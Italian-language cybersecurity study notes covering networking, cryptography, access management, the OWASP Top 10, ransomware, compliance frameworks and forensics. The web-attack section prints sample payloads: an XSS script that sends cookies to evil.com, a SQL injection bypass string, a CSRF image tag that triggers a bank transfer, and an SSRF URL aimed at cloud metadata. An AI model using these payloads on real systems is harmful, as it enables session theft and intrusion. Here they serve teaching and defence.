La Triade CIA (anche nota come RID in italiano) è il modello fondamentale della sicurezza informatica. Ogni controllo di sicurezza esiste per proteggere almeno uno di questi tre principi.

Ogni decisione di sicurezza comporta trade-off tra i tre principi. Esempio: la massima disponibilità (nessun downtime) può confliggere con la confidenzialità (dati non cifrati per velocità). La sicurezza è trovare il bilanciamento corretto per il contesto.

Identificatore pubblico univoco per ogni vulnerabilità nota. Formato: CVE-ANNO-NUMERO (es. CVE-2021-44228 = Log4Shell). Database ufficiale: NVD (National Vulnerability Database) del NIST.

Punteggio 0–10 che valuta la gravità di una CVE. Considera: vettore d'attacco, complessità, privilegi richiesti, impatto su riservatezza, integrità e disponibilità.

Vulnerabilità scoperta e sfruttabile per cui NON esiste ancora una patch.

1. Vulnerabilità scoperta
2. Segnalazione → apertura CVE
3. Il produttore sviluppa la patch
4. Patch distribuita e installata

SOC (Security Operations Center): unità H24/365 per monitoraggio, threat detection, incident response e threat intelligence.

CISO (Chief Information Security Officer): responsabile della strategia di sicurezza. Riporta al CEO/CTO. Definisce policy, budget e compliance (GDPR, ISO 27001).

Processo continuo: inventario asset → scansione CVE → prioritizzazione CVSS → test staging → deploy → verifica.

La sicurezza a livello di sistema operativo è la base su cui poggiano tutte le difese applicative. Un OS mal configurato vanifica qualsiasi controllo superiore.

CIS Benchmarks — linee guida di hardening per ogni OS (Windows, Linux, macOS) prodotte dal Center for Internet Security. Standard di riferimento per audit e compliance.

Il fattore umano è la vulnerabilità più difficile da patchare. Il 90%+ degli incidenti di sicurezza ha una componente umana — errori, ingenuità, negligenza o dolo.

Identità digitale — l'insieme delle credenziali e attributi che identificano un utente nei sistemi digitali. Include:

• Credenziali di autenticazione (username/password, certificati, token)
• Attributi di profilo (ruolo, reparto, livello di accesso)
• Impronta comportamentale (orari di lavoro, dispositivi usati, pattern di accesso)

Programma di Security Awareness — formazione continua obbligatoria per ridurre il rischio umano:

• Phishing simulation — campagne di test periodiche
• Training annuale obbligatorio su policy aziendali
• Incident reporting culture — incentivare la segnalazione senza penalizzare gli errori
• Clean desk policy, password policy, use of corporate devices

Livello 1 — Fisico: si occupa della trasmissione grezza di bit sul mezzo fisico. Non conosce frame, indirizzi o protocolli — solo segnali.

Livello 2 — Data Link: gestisce la consegna frame-per-frame sulla stessa rete fisica. Usa indirizzi MAC (48 bit) e si divide in due sottolivelli: LLC (controllo logico) e MAC (controllo accesso al mezzo).

Un Access Point (AP) estende la rete cablata in modalità wireless, permettendo ai dispositivi Wi-Fi di connettersi. Un Wireless Controller centralizza la gestione di decine o centinaia di AP — tipico in ambienti enterprise.

Standard IEEE 802.11:

Modem (MOdulator-DEModulator): converte il segnale digitale della rete LAN nel segnale analogico/fisico del provider (DSL, fibra, coassiale). Opera a L1.

Gateway: dispositivo che collega due reti con protocolli diversi. In senso pratico, il router di casa è il "gateway predefinito" della LAN verso Internet — ogni pacchetto destinato fuori dalla subnet locale viene inviato qui.

La sicurezza Wi-Fi si è evoluta in risposta a vulnerabilità scoperte nei protocolli precedenti:

WPA3 miglioramenti chiave: SAE (Simultaneous Authentication of Equals) sostituisce PSK — anche se la password viene catturata, le sessioni precedenti restano protette (Perfect Forward Secrecy). Evil Twin / PMKID Attack: l'attaccante crea un falso AP con lo stesso SSID per intercettare le credenziali — difesa: 802.1X con certificati server.

* MAU bypassa automaticamente il nodo guasto.

TOKEN = frame speciale che circola antiorario. Solo chi ha il token può trasmettere. Deterministico, no collisioni. Oggi obsoleto — sostituito da Ethernet.

32 bit = 4 ottetti decimali separati da punti. Ogni ottetto: 0–255.

192   .  168   .    1   .   10
11000000.10101000.00000001.00001010

→ Parte di RETE  : determinata dalla subnet mask
→ Parte di HOST  : identifica il singolo dispositivo

IPv6: 128 bit, 8 gruppi esadecimali. 2001:db8::1 (:: = gruppi di zeri omessi)

Privati RFC 1918 (non instradati su Internet): 10.0.0.0/8 · 172.16.0.0/12 · 192.168.0.0/16

Speciali: 127.0.0.1 loopback · 169.254.x.x APIPA · 255.255.255.255 broadcast globale

3-Way Handshake TCP:

Client → Server:  SYN  (seq=x)
Server → Client:  SYN-ACK  (seq=y, ack=x+1)
Client → Server:  ACK  (ack=y+1)  →  connessione stabilita

UDP: elimina tutto l'overhead di controllo (sequenze, ack, ritrasmissioni) per massimizzare la velocità. Dove la perdita di un singolo pacchetto è meno grave del ritardo — streaming video, VoIP, gaming — UDP è la scelta corretta.

Solo diagnostica e controllo — non trasporta dati utente. Integrato in IP, non ha porte.

• ping → Echo Request/Reply — verifica raggiungibilità e latenza
• traceroute → sfrutta il campo TTL (Time To Live) del pacchetto IP: invia pacchetti con TTL crescente (1, 2, 3...). Ogni router decrementa il TTL; quando arriva a 0 risponde con un messaggio ICMP "Time Exceeded" rivelando il suo IP. In questo modo si mappa l'intero percorso hop per hop.
• Messaggi errore: Port Unreachable, Net Unreachable, Redirect

Abusi:

• Ping flood (DoS): saturazione della banda e della CPU del target con Echo Request massivi
• ICMP Tunneling: un malware inserisce dati esfiltrati nel campo payload di un Echo Request. Poiché molti firewall lasciano passare i ping senza ispezionarne il contenuto, i dati escono silenziosamente dalla rete. Difesa: deep packet inspection o blocco ICMP in uscita

Risolve un indirizzo IP in indirizzo MAC sulla stessa rete locale. Prima di inviare un frame Ethernet, l'host deve conoscere il MAC del destinatario — ARP lo scopre via broadcast.

Host A (192.168.1.10) vuole parlare con Host B (192.168.1.20):
1. A → broadcast: "Chi ha 192.168.1.20? Dimmi il tuo MAC"
2. B → A: "Sono io, il mio MAC è AA:BB:CC:DD:EE:FF"
3. A memorizza nella ARP cache: 192.168.1.20 → AA:BB:CC:DD:EE:FF

ARP Poisoning / Spoofing: un attaccante invia risposte ARP fasulle per associare il proprio MAC all'IP del gateway — tutto il traffico della rete passa attraverso di lui (Man-in-the-Middle). Difesa: Dynamic ARP Inspection (DAI) sugli switch managed, segmentazione VLAN.

Assegna automaticamente IP, subnet mask, gateway predefinito e server DNS ai client della rete. Senza DHCP, ogni dispositivo richiederebbe configurazione manuale.

Sequenza DORA:

Client → broadcast:  DISCOVER  (cerco un server DHCP)
Server → client:     OFFER     (ti offro 192.168.1.50/24, gw .1, dns 8.8.8.8)
Client → broadcast:  REQUEST   (accetto l'offerta del server X)
Server → client:     ACK       (confermato, lease di 24 ore)

Gerarchia distribuita che risolve nomi logici in indirizzi IP — non è una semplice tabella ma un albero: Root Servers (.) → TLD (.it, .com) → Nameserver Autoritativi del dominio. UDP per query veloci, TCP per trasferimenti di zona.

Vettori di attacco:

• Zone Transfer (AXFR): se il nameserver è mal configurato, un attaccante può richiedere l'intero database della zona DNS — tutti gli host interni, IP, sottodomini — rivelando completamente la topologia della rete. Difesa: limitare AXFR ai soli nameserver secondari autorizzati.
• DNS Spoofing / Cache Poisoning: inserimento di record DNS falsi nella cache del resolver per dirottare il traffico verso IP malevoli (phishing, MitM). Difesa: DNSSEC.

Condivide directory tra sistemi Unix/Linux come se fossero dischi locali.

# Server — /etc/exports
/dati  192.168.1.0/24(rw,sync,no_root_squash)

# Client
mount -t nfs 192.168.1.5:/dati /mnt/condiviso

• NFS vs SMB: NFS (porta 2049) = Linux/Unix · SMB (porta 445) = Windows — entrambi L7, protocolli di file sharing su rete IP
• NFS vs SAN: NFS → accesso a FILE via IP (L7) · SAN → accesso a BLOCCHI via FC/iSCSI (fuori modello OSI classico)
• root squash: opzione di sicurezza fondamentale — il client si presenta come root, ma il server mappa forzatamente quell'accesso all'utente anonimo nobody (UID 65534), impedendo che i privilegi root del client si propaghino sui file del server

Monitora dispositivi di rete (router, switch, server). Componenti: NMS (manager) + Agent (sui dispositivi) + MIB (Management Information Base — il dizionario degli oggetti monitorabili).

OID (Object Identifier): indirizzo numerico gerarchico che identifica univocamente ogni dato monitorabile nella MIB:

OID: 1.3.6.1.2.1.1.1.0 = iso.org.dod.internet.mgmt.mib-2.system.sysDescr

AND bit a bit tra IP e maschera → indirizzo di rete. CIDR (/xx) supera le classi A/B/C.

/16: 192.168.x.x si vedono tutti direttamente → router invisibile → rete flat.

/24: 192.168.1.x NON vede 192.168.2.x → passa dal gateway → separazione reti, DMZ, VLAN.

Punto di uscita della rete locale. Se un host vuole raggiungere un IP fuori dalla sua subnet, invia il pacchetto al gateway che decide come instradarlo.

Link-State: ogni router ha una copia dell'intera topologia della rete (LSDB — Link State Database). Usa l'algoritmo di Dijkstra per calcolare il percorso più breve basandosi sul costo — valore inversamente proporzionale alla bandwidth del link (banda alta = costo basso). Converge in secondi, nessun limite di hop. Multicast 224.0.0.5. Standard enterprise.

Aree OSPF: la rete è divisa in aree gerarchiche (Area 0 = backbone obbligatoria). Le aree riducono il volume di LSA (Link State Advertisement) e la dimensione della LSDB in reti molto grandi.

router ospf 1
  network 192.168.1.0 0.0.0.255 area 0
  network 10.0.0.0 0.255.255.255 area 0

Distance Vector: ogni router conosce solo la direzione e la distanza in hop verso le destinazioni, non la topologia completa. Algoritmo Bellman-Ford. Aggiornamento ogni 30s, convergenza lenta (minuti). Limite massimo: 15 hop — alla metrica 16 la destinazione è considerata irraggiungibile (∞). Questo limite nasce per prevenire il counting-to-infinity loop.

Gestisce via software più link eterogenei (MPLS, broadband, LTE, 5G) in parallelo. Il modello è Overlay/Underlay: la rete logica SD-WAN (overlay) si sovrappone alla rete fisica sottostante (underlay) indipendentemente dal tipo di connessione.

• Failover automatico tra link — se il link MPLS cade, il traffico passa su broadband in ms
• Traffic shaping per applicazione — priorità a VoIP/videoconferenza su link congestionato
• Gestione centralizzata via controller cloud — visibilità e policy da un'unica console
• Costo molto inferiore a MPLS dedicato mantenendo qualità del servizio

Funzione UNIDIREZIONALE: trasforma dati di qualsiasi dimensione in una stringa fissa di caratteri esadecimali. Dall'hash è computazionalmente impossibile risalire ai dati originali.

• Integrità file: confronta hash scaricato con quello ufficiale
• Password: hashate con SALT univoco → anche in caso di breach l'attaccante ha solo hash
• Blockchain: ogni blocco contiene l'hash del precedente → modificarlo invalida la catena

"ciao" → b94f6f125c79e3a5ffaa826f584c10d52ada669e6762051b826b55776d05a8df

Mittente e destinatario usano la stessa chiave per cifrare e decifrare. Veloce, adatta a grandi volumi di dati.

Coppia di chiavi matematicamente legate: chiave pubblica (distribuibile) e chiave privata (segreta). Ciò che cifra una, decifra solo l'altra.

Infrastruttura gerarchica che gestisce il ciclo di vita dei certificati digitali, garantendo l'autenticità delle chiavi pubbliche.

Protocollo che garantisce riservatezza, integrità e autenticazione nelle comunicazioni. SSL è il predecessore deprecato. È il fondamento della PKI moderna.

TLS 1.3 vs 1.2: la versione 1.3 ha eliminato algoritmi storicamente deboli (MD5, RC4, RSA statico) e ridotto i round-trip dell'handshake da 2 a 1-RTT — connessioni più veloci e più sicure by design.

Handshake ibrido (cuore di TLS): la crittografia asimmetrica (ECDHE/RSA) viene usata solo per scambiare una chiave di sessione monouso — poi tutta la comunicazione usa crittografia simmetrica (AES-GCM), molto più veloce per i volumi di dati reali.

ClientHello → ServerHello + certificato → verifica CA
→ scambio chiave sessione (ECDHE) → dati cifrati AES-GCM

Garantisce autenticità (chi ha firmato), integrità (il documento non è stato alterato) e non ripudio (il mittente non può negare).

1. Il mittente calcola l'hash del documento (es. SHA-256)
2. Cifra l'hash con la propria chiave privata → firma digitale
3. Il destinatario decifra la firma con la chiave pubblica del mittente
4. Confronta l'hash ottenuto con quello ricalcolato sul documento ricevuto

L'efficacia della crittografia dipende interamente dalla sicurezza delle chiavi. La gestione del ciclo di vita delle chiavi è un processo critico.

La Full Disk Encryption (FDE) cifra l'intero disco rigido — sistema operativo, dati, file temporanei — proteggendo i dati anche in caso di furto fisico del dispositivo. Senza la chiave/PIN, il disco è illeggibile.

TPM (Trusted Platform Module): chip hardware che custodisce la chiave di cifratura del disco e la rilascia solo se la sequenza di avvio è integra — protegge da tampering fisico della sequenza di boot.

CSV (Cluster Shared Volumes) è un livello di astrazione sopra la SAN che permette a più nodi di un cluster Windows di accedere allo stesso volume contemporaneamente — fondamentale per l'alta disponibilità (es. Failover Cluster, Hyper-V live migration). Non va confuso con il formato CSV testuale (Comma-Separated Values).

RAID 5 — 3 dischi:
D1: A1   D2: A2   D3: parità(A1 XOR A2)
D1: par  D2: B1   D3: B2   ← parità ruota

La deduplication è una funzione di ottimizzazione dello storage che elimina le copie ridondanti dei dati memorizzando ogni blocco unico una sola volta. Se lo stesso file esiste in 100 VM, viene archiviato fisicamente una sola volta — le altre 99 istanze sono puntatori.

Risparmio tipico: VM quasi identiche → 95%+ di riduzione. File utente con molte copie → 50-80%. Backup giornalieri incrementali → 90%+. La deduplication è distinta dalla compressione (che riduce i dati non duplicati) — le due tecnologie sono spesso combinate.

ETL è il processo standard per spostare e trasformare dati da sistemi sorgente verso un sistema destinazione (data warehouse, nuovo DB, cloud). È al cuore della migrazione sicura dei dati.

Trasferimento sicuro dei dati: durante le fasi ETL usare sempre protocolli cifrati: SFTP (SSH File Transfer Protocol), FTPS (FTP over TLS), HTTPS. Mai trasferire dati in chiaro con FTP o HTTP.

Dispositivo o software che filtra il traffico di rete in base a regole (policy), controllando cosa entra e cosa esce dalla rete.

IDS (Intrusion Detection System): monitora e avvisa di attività sospette ma non blocca. IPS (Intrusion Prevention System): rileva e blocca in tempo reale.

Metodi di rilevamento: signature-based (pattern noti, bassa efficacia su 0-day) · anomaly-based (deviazione dal baseline, più efficace su attacchi nuovi) · stateful protocol analysis.

Crea un tunnel cifrato tra client e server VPN, proteggendo il traffico da intercettazioni e mascherando l'IP reale dell'utente.

Framework di policy e tecnologie per garantire che le persone giuste accedano alle risorse giuste al momento giusto per le ragioni giuste.

L'autenticazione verifica l'identità. MFA (Multi-Factor Authentication) richiede almeno 2 fattori di categorie diverse.

Un'unica autenticazione dà accesso a più sistemi/applicazioni senza re-inserire le credenziali.

Principio del privilegio minimo (PoLP): ogni utente, processo o sistema deve avere solo i permessi strettamente necessari al proprio compito.

• Privilege creep: accumulo progressivo di permessi nel tempo (promozioni, cambio ruolo) senza revoca di quelli precedenti
• Separazione dei privilegi: nessun singolo account deve poter fare tutto
• Just-in-time (JIT): privilegi elevati concessi solo quando servono e per un tempo limitato
• PAM (Privileged Access Management): strumenti per gestire, monitorare e registrare l'uso di account privilegiati

Tecnica con cui un attaccante (o un malware) ottiene permessi superiori a quelli assegnati — da utente standard a amministratore, o da processo user-mode a kernel. È una delle fasi cruciali nella kill chain dopo l'accesso iniziale.

Tecniche comuni su Windows:

• Token Impersonation: furto del token di autenticazione di un processo con privilegi elevati
• Pass-the-Hash: uso dell'hash NTLM senza conoscere la password in chiaro
• UAC Bypass: aggira il meccanismo User Account Control sfruttando processi trusted
• DLL Hijacking: un'applicazione carica una DLL malevola al posto di quella legittima

Tecniche comuni su Linux:

• SUID Exploitation: eseguibile con bit SUID impostato → gira con privilegi del proprietario (es. root)
• Cron Job Abuse: script eseguito da cron come root che include percorsi scrivibili dall'utente
• Kernel Exploit: vulnerabilità nel kernel Linux che permette di ottenere shell root

Analizza e filtra HTTP/HTTPS. Opera a Livello 7 — ispeziona il payload. Blocca: SQL Injection, XSS, CSRF, Path Traversal.

CA: emette certificati X.509. PKI: CA root → CA intermedie → certificati end-entity. CRL/OCSP: revoca.

Wildcard: *.dominio.com protegge tutti i sottodomini con un unico certificato.

• Honeypot: sistema esca deliberatamente vulnerabile usato per attirare gli attaccanti e studiarne le tecniche — movimenti laterali, tool usati, payload. Genera alert ad alta fedeltà (qualsiasi traffico verso un honeypot è sospetto per definizione)
• Telnet (23): ❌ In chiaro — deprecato
• SSH (22): ✔ Cifrato — standard odierno — sostituisce Telnet su tutti i sistemi moderni
• Print Server: vettore di attacco laterale spesso trascurato — PrintNightmare (CVE-2021-34527) è un esempio recente

Il SSDLC (Secure Software Development Life Cycle) integra la sicurezza in ogni fase dello sviluppo software invece di aggiungerla alla fine (approccio "security as an afterthought").

DevSecOps — integrazione della sicurezza nella pipeline CI/CD: ogni commit triggera test di sicurezza automatici prima del merge.

L'attaccante si interpone intercettando o alterando il traffico.

• ARP Poisoning · DNS Spoofing · SSL Stripping · Evil Twin

Contromisure: HTTPS+HSTS · certificati client · VPN · DNSSEC · 802.1X

Il social engineering è la tecnica madre degli attacchi che sfruttano la psicologia umana anziché vulnerabilità tecniche. Non attacca i sistemi — attacca le persone. Il phishing è la forma digitale più diffusa di social engineering.

Perché funziona: i criminali sfruttano leve psicologiche precise — urgenza ("il tuo conto verrà sospeso"), autorità ("siamo la tua banca"), paura, curiosità ("hai vinto un premio"). Non serve essere ingenui: basta un momento di distrazione.

Difese:

• Verificare SEMPRE l'identità del mittente — non attraverso i dati nel messaggio stesso, ma contattando direttamente via canale diverso
• Passare il mouse sul link prima di cliccare — l'URL reale compare nel browser
• Non fornire mai credenziali, dati personali o autorizzare pagamenti sotto pressione temporale
• Programmi di Security Awareness con simulazioni di phishing periodiche
• MFA — anche se le credenziali vengono rubate, l'attaccante non ha il secondo fattore

Il ransomware è il malware che cifra i dati della vittima e chiede un riscatto. Dal 2020 le tecniche sono evolute significativamente — il semplice "paga e sblocchi" è ormai obsoleto.

Contromisure: backup 3-2-1 offline e testato; segmentazione di rete; EDR/XDR; patch management rigoroso; piano di incident response specifico per ransomware; mai pagare il riscatto — non garantisce il ripristino e finanzia la criminalità.

Il social engineering manipola psicologicamente le persone per ottenere credenziali, accessi o informazioni riservate, sfruttando fiducia, urgenza e paura.

Cifra i file della vittima e chiede un riscatto (in criptovaluta) per la chiave di decifratura. Le varianti moderne usano doppia estorsione: cifra + esfiltrazione dati.

1. Infezione: phishing, RDP esposto, vulnerabilità non patchata, supply chain
2. Persistence & movimento laterale: si diffonde nella rete, eleva i privilegi
3. Esfiltrazione (RaaS moderno): copia dati verso server C&C dell'attaccante
4. Cifratura: AES per i file, RSA/ECC per proteggere la chiave AES
5. Riscatto: richiesta in Bitcoin/Monero con timer, minaccia di pubblicare i dati

DoS: un singolo attaccante satura le risorse del target. DDoS: migliaia di macchine (botnet) colpiscono simultaneamente.

L'attaccante inserisce codice SQL in un campo di input per manipolare le query del database — lettura, modifica, cancellazione dati o bypass autenticazione.

-- Input malevolo nel campo username:
' OR '1'='1

-- Query risultante:
SELECT * FROM users WHERE user='' OR '1'='1' AND pass='x'
-- Risultato: accede senza credenziali valide

Injection di codice JavaScript malevolo in una pagina web. Il browser della vittima esegue lo script nel contesto del sito legittimo → furto cookie, reindirizzamento, defacement.

<script>document.location='https://evil.com/?c='+document.cookie</script>
// Ruba i cookie di sessione e li invia all'attaccante

Forza l'utente autenticato a eseguire azioni indesiderate su un sito a cui è loggato, sfruttando la sessione già attiva nel browser.

<!-- Pagina malevola visitata dalla vittima loggata in banca: -->
<img src="https://banca.it/bonifico?dest=attaccante&importo=5000">
<!-- Il browser invia la richiesta con i cookie di sessione della banca -->

Differenza con XSS: XSS sfrutta fiducia del browser nell'utente. CSRF sfrutta fiducia del server nella sessione.

Lista aggiornata delle vulnerabilità web più critiche. Riferimento standard mondiale.

L'app non verifica i permessi. Esempi: /admin via URL, IDOR (id=123→124), escalation verticale. Contromisure: deny-by-default, controlli lato server, minimo privilegio.

Cifratura assente o inadeguata. Esempi: password in chiaro, HTTP, MD5/SHA-1 per password, chiavi hardcoded. Contromisure: HTTPS+HSTS, bcrypt/Argon2+SALT, TLS 1.2/1.3.

Input non sanificato eseguito come codice.

SELECT * FROM users WHERE user='' OR '1'='1'
→ Bypassa autenticazione

Contromisure: prepared statements, validazione input, WAF.

Difetti architetturali e di progettazione — mancanza di threat modeling, assenza di security requirements, design pattern non sicuri. Non è un bug di implementazione ma di concezione.

Configurazioni di default non cambiate, porte/servizi inutili aperti, permessi eccessivi, messaggi di errore verbosi che rivelano informazioni interne.

• Credenziali di default su router/DB/applicazioni
• Directory listing attiva su web server
• CORS troppo permissivo (Access-Control-Allow-Origin: *)
• Debug mode attivo in produzione
• S3 bucket pubblici non intenzionali (AWS)

Librerie, framework e componenti con vulnerabilità note e non aggiornate. La supply chain software è un vettore di attacco crescente.

• Log4Shell (CVE-2021-44228) — Log4j usato in milioni di applicazioni Java
• SolarWinds — aggiornamento software conteneva backdoor
• npm packages malevoli — dependency confusion, typosquatting

Difetti nei meccanismi di autenticazione e gestione delle sessioni che permettono all'attaccante di impersonare altri utenti.

• Password deboli o senza rate limiting → brute force
• Session token predicibili o non invalidati dopo logout
• Mancanza di MFA su account critici
• Credenziali in chiaro in URL o log
• Gestione errata del "recupera password"

Codice o dati che vengono assunti integri senza verifica — pipeline CI/CD non sicure, update automatici non firmati, deserializzazione non sicura.

• Plugin/librerie scaricati senza verifica firma digitale
• Pipeline CI/CD con accesso write non protetto
• Deserializzazione di oggetti non attendibili → RCE
• Insecure auto-update (HTTP invece di HTTPS + firma)

Senza log adeguati, un attacco può passare inosservato per mesi. Il tempo medio di rilevamento di un breach è ancora superiore a 200 giorni.

• Login falliti non loggati → brute force invisibile
• Log senza timestamp affidabile o con dati insufficienti
• Assenza di SIEM o alert su eventi anomali
• Log non protetti → l'attaccante li cancella dopo il breach

L'attaccante forza il server a effettuare richieste HTTP verso risorse interne o esterne arbitrarie — bypassando firewall e accedendo a servizi cloud metadata.

# Esempio: parametro URL non validato
https://sito.it/fetch?url=http://169.254.169.254/latest/meta-data/
# → accede ai metadata AWS dalla rete interna del server

Processo sistematico per identificare, classificare e prioritizzare le vulnerabilità in un sistema — senza sfruttarle.

1. Pianificazione: scope, asset da testare, finestre di manutenzione
2. Scansione: tool automatizzati (Nessus, OpenVAS, Nmap) identificano CVE
3. Analisi: eliminazione falsi positivi, classificazione per CVSS
4. Report: lista vulnerabilità con severità, impatto e remediation
5. Remediation & re-scan: verifica delle patch applicate

Simulazione controllata di un attacco reale — il pentester sfrutta le vulnerabilità per valutare l'impatto reale e la capacità di rilevamento/risposta.

Fasi (metodologia PTES/OWASP): Recon → Scanning → Exploitation → Post-exploitation → Reporting

Raccolta di informazioni sul target prima di qualsiasi interazione diretta — OSINT (Open Source Intelligence).

Sistemi di classificazione standardizzati per vulnerabilità, debolezze e pattern di attacco — il linguaggio comune della cybersecurity.

Anatomia di un CVE: CVE-ANNO-NUMERO → CVE-2021-44228 = vulnerabilità #44228 scoperta nel 2021.

CVSS v3.1 — scala severità:

Raccolta, analisi e condivisione di informazioni sulle minacce informatiche per supportare decisioni di sicurezza proattive. CTI = Cyber Threat Intelligence.

Fonti di Threat Intelligence:

• CERT/CSIRT: Computer Emergency Response Team — notifiche incidenti nazionali (CERT-IT, ENISA)
• ISAC: Information Sharing and Analysis Center — condivisione settoriale (FS-ISAC per finanza, H-ISAC per sanità)
• OSINT: feed RSS di sicurezza, threat reports vendor (Mandiant, CrowdStrike, Kaspersky)
• Dark web monitoring: monitoraggio forum underground per early warning
• MITRE ATT&CK: knowledge base strutturata di TTP degli attaccanti

Artefatti osservabili che indicano con alta probabilità un'intrusione o una compromissione in atto o passata.

Regolamento europeo sulla protezione dei dati personali, in vigore dal 25 maggio 2018. Si applica a qualsiasi organizzazione che tratti dati di cittadini UE.

• Data breach: notifica all'Autorità (Garante) entro 72 ore
• Sanzioni: fino a €20M o 4% del fatturato globale annuo
• DPO (Data Protection Officer): responsabile della protezione dei dati e interfaccia ufficiale con il Garante — obbligatorio per enti pubblici e grandi trattatori ad alto rischio
• DPIA (Data Protection Impact Assessment): valutazione d'impatto obbligatoria per trattamenti ad alto rischio (es. sorveglianza di massa, dati biometrici, profilazione)
• Diritti dell'interessato: accesso, rettifica, cancellazione (diritto all'oblio), portabilità, opposizione

Standard internazionale per la gestione della sicurezza delle informazioni (ISMS — Information Security Management System). Certificabile da enti accreditati.

• Basato sul ciclo PDCA (Plan-Do-Check-Act)
• Annesso A: 93 controlli di sicurezza organizzati in 4 domini (organizzativo, persone, fisico, tecnologico)
• Richiede risk assessment documentato e trattamento dei rischi
• Audit di certificazione + sorveglianza annuale + rinnovo ogni 3 anni

Framework volontario del NIST (National Institute of Standards and Technology) per gestire il rischio cyber. Versione 2.0 pubblicata nel 2024.

Aggiornamento della Direttiva NIS (2016), in vigore dal 2023 con recepimento entro ottobre 2024. Estende gli obblighi di sicurezza a molti più settori.

• Settori essenziali: energia, trasporti, banche, infrastrutture digitali, sanità, acqua, spazio
• Settori importanti: servizi postali, gestione rifiuti, produzione, fornitori digitali
• Obblighi: misure di gestione del rischio, notifica incidenti gravi all'autorità competente (ACN — Agenzia per la Cybersicurezza Nazionale, in Italia) entro 24h (Early Warning) e 72h (Notifica completa con analisi)
• Responsabilità del management: gli organi direttivi rispondono personalmente
• Sanzioni: fino a €10M o 2% fatturato globale (settori essenziali)

7 principi fondanti (Ann Cavoukian): proattivo · privacy di default · privacy nel design · funzionalità totale · sicurezza end-to-end · visibilità · rispetto per la privacy utente.

L'audit di sicurezza è una valutazione sistematica e indipendente dei controlli di sicurezza di un'organizzazione. La compliance è l'insieme delle attività per dimostrare conformità a standard e normative.

Fasi di un audit ISO 27001:

1. Stage 1 (document review): verifica della documentazione ISMS, policy, procedure
2. Stage 2 (on-site audit): verifica implementazione reale dei controlli
3. Sorveglianza annuale: audit intermedio per mantenere la certificazione
4. Rinnovo triennale: audit completo ogni 3 anni

I CIS Controls (versione attuale: v8) sono una raccolta di 18 controlli di sicurezza prioritizzati, pubblicati dal Center for Internet Security. A differenza di ISO 27001 (che dice cosa fare) o NIST CSF (che fornisce un framework), i CIS Controls dicono esattamente cosa implementare e in quale ordine.

I 6 controlli base (IG1) — il minimo per qualsiasi organizzazione:

1. Inventario e controllo degli asset hardware
2. Inventario e controllo degli asset software
3. Protezione dei dati
4. Configurazione sicura degli asset
5. Gestione account
6. Gestione del controllo degli accessi

La TC-ACN (Tassonomia di Classificazione dell'ACN) è il nuovo standard italiano per la gestione e notifica degli incidenti di sicurezza, sviluppato dall'Agenzia per la Cybersicurezza Nazionale. Supera i limiti del modello ENISA offrendo un approccio più granulare con 144 attributi e 22 predicati.

Perché è importante: la TC-ACN consente di rispettare gli obblighi di notifica NIS2 all'ACN in modo standardizzato, migliorare la comunicazione con il CSIRT Italia, e confrontare incidenti in modo uniforme. È ispirata al modello CVSS per la descrizione multidimensionale.

Il rischio è la probabilità che una minaccia sfrutti una vulnerabilità causando un impatto negativo su un asset.

Rischio = Probabilità × Impatto
Rischio = Minaccia × Vulnerabilità × Valore dell'asset

Fattori interni: processi, persone, tecnologie, governance dell'organizzazione.
Fattori esterni: threat actors, contesto geopolitico, normative, catena di fornitura.

Processo sistematico e ciclico per identificare, valutare e trattare i rischi — basato su ISO 31000 e ISO/IEC 27005 per il rischio informatico.

1. Identificazione: inventario asset, catalogo minacce e vulnerabilità, brainstorming, threat modeling
2. Analisi: stima probabilità e impatto per ogni rischio identificato (qualitativa o quantitativa)
3. Valutazione: prioritizzazione tramite matrice rischio (heat map), confronto con risk appetite
4. Trattamento: scegliere la strategia per ogni rischio
5. Monitoraggio: verifica continua, KRI (Key Risk Indicator), revisione periodica

Valutazione sistematica e indipendente dei controlli di sicurezza per verificarne l'efficacia e la conformità agli standard.

Fasi: pianificazione → raccolta evidenze → analisi gap → report → remediation plan → follow-up.

Modelli di deployment: Public cloud (risorse condivise) · Private cloud (dedicato) · Hybrid (on-premise + cloud) · Multi-cloud (più provider).

Contromisure: MDM (Mobile Device Management) per dispositivi aziendali · aggiornamenti OS e app · store ufficiali · VPN aziendale · cifratura dispositivo · remote wipe.

I dispositivi IoT (telecamere, sensori, router, PLC industriali) sono spesso il punto di ingresso più debole delle reti aziendali e domestiche.

Caso Mirai Botnet (2016): 600.000 dispositivi IoT con credenziali di default compromessi → DDoS da 1.1 Tbps.

Contromisure: segmentazione VLAN IoT isolata · cambio credenziali di default · aggiornamenti firmware · disabilitare servizi inutili · network monitoring.

In ambienti aziendali, ogni smartphone e tablet è un potenziale vettore d'attacco. MDM (Mobile Device Management) e MAM (Mobile Application Management) sono le due tecnologie per gestire e proteggere i dispositivi mobili dei dipendenti.

Funzionalità di sicurezza MDM:

• Remote wipe: cancellazione da remoto di tutti i dati in caso di smarrimento o furto
• Jailbreak/root detection: blocca l'accesso ai dati aziendali se il dispositivo è compromesso
• Policy enforcement: impone PIN minimo, cifratura, blocco screenshot nelle app aziendali
• App whitelist/blacklist: controlla quali applicazioni possono essere installate
• Containerization: separa lo spazio di lavoro aziendale da quello personale (approccio BYOD)

EDR è la generazione successiva all'antivirus tradizionale. Invece di cercare solo firme note di malware, un agente EDR monitora continuamente il comportamento del sistema — processi, connessioni di rete, accessi al filesystem, chiamate di sistema — e rileva anomalie che indicano un attacco in corso, anche se il malware è sconosciuto (zero-day).

XDR (Extended Detection and Response) amplia EDR integrando endpoint, rete, email, cloud in un'unica piattaforma di rilevamento correlato.

BYOD e rischi specifici: un dispositivo personale (BYOD) che accede alla rete aziendale senza agente EDR è un punto cieco — non monitorato, non conforme, non gestibile in caso di compromissione. Soluzioni: NAC (Network Access Control) per bloccare l'accesso se non conforme, o MAM per isolare i dati aziendali.

L'IT (Information Technology) gestisce dati e informazioni. L'OT (Operational Technology) controlla processi fisici — macchinari, impianti, infrastrutture critiche.

Architettura tipica SCADA: Sensori/attuatori → RTU/PLC → Rete OT → Server SCADA → HMI operatore → (eventuale) collegamento IT aziendale.

Standard internazionale per la sicurezza dei sistemi di automazione e controllo industriale (IACS). Equivalente dell'ISO 27001 per il mondo OT.

Security Level (SL): SL1 (protezione casuale) → SL2 (attaccante intenzionale, risorse limitate) → SL3 (attaccante sofisticato) → SL4 (nation-state).

Complementare: NIST SP 800-82 — guida americana per la sicurezza dei sistemi ICS/SCADA.

Disciplina che raccoglie, preserva e analizza le prove digitali mantenendo la chain of custody (catena di custodia) per uso legale.

• Ordine di volatilità: raccogliere prima le prove più volatili (RAM → processi → connessioni → log → disco)
